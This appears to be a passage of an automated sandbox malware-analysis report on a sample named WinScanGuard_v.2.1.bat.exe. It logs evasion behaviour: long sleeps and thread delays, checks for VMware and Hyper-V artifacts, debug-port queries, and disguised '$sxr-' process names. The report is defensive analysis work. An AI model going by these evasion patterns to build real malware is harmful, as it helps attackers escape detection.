              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: c:\windows\$sxr-powershell.exeKey value queried: Powershell behaviorJump to behavior
              Source: c:\users\user\desktop\winscanguard_v.2.1.bat.exeKey value queried: Powershell behaviorJump to behavior
              Source: c:\windows\$sxr-powershell.exeKey value queried: Powershell behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe TID: 6220Thread sleep count: 4099 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe TID: 6220Thread sleep count: 5188 > 30Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe TID: 2124Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\$sxr-powershell.exe TID: 6368Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\$sxr-powershell.exe TID: 3020Thread sleep count: 473 > 30
              Source: C:\Windows\$sxr-powershell.exe TID: 5952Thread sleep count: 114 > 30
              Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep count: 5670 > 30
              Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep time: -5670000s >= -30000s
              Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep count: 4325 > 30
              Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep time: -4325000s >= -30000s
              Source: C:\Windows\System32\lsass.exe TID: 5904Thread sleep count: 9971 > 30
              Source: C:\Windows\System32\lsass.exe TID: 5904Thread sleep time: -9971000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 6464Thread sleep count: 239 > 30
              Source: C:\Windows\System32\svchost.exe TID: 6464Thread sleep time: -239000s >= -30000s
              Source: C:\Windows\System32\dwm.exe TID: 664Thread sleep count: 8323 > 30
              Source: C:\Windows\System32\dwm.exe TID: 664Thread sleep time: -8323000s >= -30000s
              Source: C:\Windows\System32\dwm.exe TID: 664Thread sleep count: 1514 > 30
              Source: C:\Windows\System32\dwm.exe TID: 664Thread sleep time: -1514000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 1612Thread sleep count: 221 > 30
              Source: C:\Windows\System32\svchost.exe TID: 1612Thread sleep time: -221000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 1440Thread sleep count: 223 > 30
              Source: C:\Windows\System32\svchost.exe TID: 1440Thread sleep time: -223000s >= -30000s
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 2088Thread sleep time: -173000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 5232Thread sleep count: 217 > 30
              Source: C:\Windows\System32\svchost.exe TID: 5232Thread sleep time: -217000s >= -30000s
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 1196Thread sleep count: 160 > 30
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 1196Thread sleep time: -160000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 3968Thread sleep count: 246 > 30
              Source: C:\Windows\System32\svchost.exe TID: 3968Thread sleep time: -246000s >= -30000s
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 7212Thread sleep count: 98 > 30
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe TID: 7212Thread sleep time: -98000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
              Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
              Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
              Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeWindow / User API: threadDelayed 4099Jump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeWindow / User API: threadDelayed 5188Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeWindow / User API: threadDelayed 4621Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeWindow / User API: threadDelayed 3781Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeWindow / User API: threadDelayed 473
              Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5670
              Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4325
              Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9971
              Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8323
              Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 1514
              Source: C:\Windows\SysWOW64\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_23-614
              Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_22-228
              Source: C:\Windows\$sxr-mshta.exeAPI coverage: 8.5 %
              Source: C:\Windows\$sxr-cmd.exeAPI coverage: 7.7 %
              Source: C:\Windows\$sxr-powershell.exeAPI coverage: 1.6 %
              Source: C:\Windows\System32\lsass.exeAPI coverage: 7.5 %
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeAPI coverage: 6.3 %
              Source: C:\Windows\System32\svchost.exeAPI coverage: 3.4 %
              Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
              Source: C:\Windows\System32\svchost.exeAPI coverage: 3.9 %
              Source: C:\Windows\$sxr-mshta.exeMemory allocated: 1A00A030000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\$sxr-mshta.exeMemory allocated: 1A00A250000 memory commit | memory reserve | memory write watchJump to behavior
              Source: C:\Windows\$sxr-mshta.exeMemory allocated: 1A00A590000 memory commit | memory reserve | memory write watchJump to behavior
              Source: C:\Windows\$sxr-mshta.exeMemory allocated: 1A00A5E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
              Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
              Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
              Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_23-382
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Windows\$sxr-mshta.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: Amcache.hve.10.drBinary or memory string: VMware
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
              Source: lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
              Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: dwm.exe, 0000001E.00000002.2933213881.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
              Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: lsass.exe, 00000019.00000002.2907841502.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046413873.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.2053136281.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2907025348.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2925839601.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000000.2070795502.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.2072742212.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2906025676.000002295CE2A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: svchost.exe, 0000001B.00000002.2907259329.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
              Source: Amcache.hve.10.drBinary or memory string: vmci.sys
              Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
              Source: Amcache.hve.10.drBinary or memory string: VMware20,1
              Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: svchost.exe, 0000001B.00000000.2053370128.000002A660662000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: svchost.exe, 00000026.00000002.2905390064.000002295CE00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
              Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
              Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: dwm.exe, 0000001E.00000002.2933213881.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDBBEDC FindFirstFileExW,13_2_000001A00BDBBEDC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B62BEDC FindFirstFileExW,16_2_0000020D0B62BEDC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61550823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,16_2_00007FF61550823C
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615502978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,16_2_00007FF615502978
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00007FF6154F1560
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,16_2_00007FF6154F35B8
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615517B4C FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF615517B4C
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878BBEDC FindFirstFileExW,21_2_00000242878BBEDC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC64BEDC FindFirstFileExW,24_2_00000225DC64BEDC
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AEBEDC FindFirstFileExW,25_2_00000202C0AEBEDC
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_04029AE0 FindFirstFileExW,26_2_04029AE0
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66130BEDC FindFirstFileExW,27_2_000002A66130BEDC
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66136BEDC FindFirstFileExW,27_2_000002A66136BEDC
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14BBEDC FindFirstFileExW,30_2_000002BAB14BBEDC
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F4BEDC FindFirstFileExW,31_2_0000026A87F4BEDC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537ABEDC FindFirstFileExW,36_2_00000179537ABEDC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D4BEDC FindFirstFileExW,36_2_0000017953D4BEDC
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_00007FF7142F1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,13_2_00007FF7142F1008
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_04000CE3 mov eax, dword ptr fs:[00000030h]26_2_04000CE3
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_040075D8 mov eax, dword ptr fs:[00000030h]26_2_040075D8
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_040087F7 mov eax, dword ptr fs:[00000030h]26_2_040087F7
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_040218E3 mov eax, dword ptr fs:[00000030h]26_2_040218E3
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_040281D8 mov eax, dword ptr fs:[00000030h]26_2_040281D8
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_040293F7 mov eax, dword ptr fs:[00000030h]26_2_040293F7
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDB7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001A00BDB7F10
              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_0000000140001368 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,CloseHandle,FindCloseChangeNotification,GetProcessHeap,HeapFree,RtlDeleteBoundaryDescriptor,HeapFree,6_2_0000000140001368
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess token adjusted: DebugJump to behavior
